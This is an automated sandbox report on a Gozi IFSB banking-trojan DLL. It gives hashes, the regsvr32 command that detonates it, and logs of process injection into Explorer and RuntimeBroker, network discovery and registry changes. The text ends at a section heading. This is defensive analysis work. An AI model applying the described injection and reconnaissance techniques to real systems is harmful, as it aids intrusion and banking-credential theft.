Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-m1nltabdel
Target 8fcfb8f38d8607c57f08f9b39139065f
SHA256 ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d

Threat Level: Known bad

The file 8fcfb8f38d8607c57f08f9b39139065f was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Gathers system information

Discovers systems in the same network

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 10:56

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 10:56

Reported

2022-08-03 10:58

Platform

win7-20220715-en

Max time kernel

87s

Max time network

44s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll

Network

N/A

Files

memory/1064-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp

memory/1660-55-0x0000000000000000-mapping.dmp

memory/1660-56-0x00000000760E1000-0x00000000760E3000-memory.dmp

memory/1660-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1660-62-0x00000000001A0000-0x00000000001AD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 10:56

Reported

2022-08-03 10:58

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

149s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1728 set thread context of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2588 set thread context of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 set thread context of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 set thread context of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 set thread context of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d898b3f779591c13da1f2b28ce32141fe3eb569a7d6f4a1152ba756aad77d00" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a94ab9e0a277a1865d03111cc1a70ac901b509c24bef77035af18ae5203b6e37" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b987cab8-05db-4909- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\071ae30bc7365699d044a75ba8191e4d9c39200fc27b8565d88dae1ec87013d4" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = e80b8e9238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\80ce800c-4267-4baa- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\1c74301e6145490c673361a45e0c00920d65268304288ab7e2e0b0ff6714a57b" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67746a65-1fa0-4632- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = 9c256d9238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = ffa4c19238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = 449ce29238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = b1d97d9238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7df64d0b8ce57658894b87824f6c7365f089fc082206dc50325f02b2cbfacdea" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0d724897-1082-4cb9- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\bf9b381c0f6d6c6843c6e75b141b29022c99e5eaf9ba7bd4b11b59983bec26d6" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\33c0dd8d-a0ef-4efa- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = dd0d9f9238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6781d2d3-a64b-43be- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

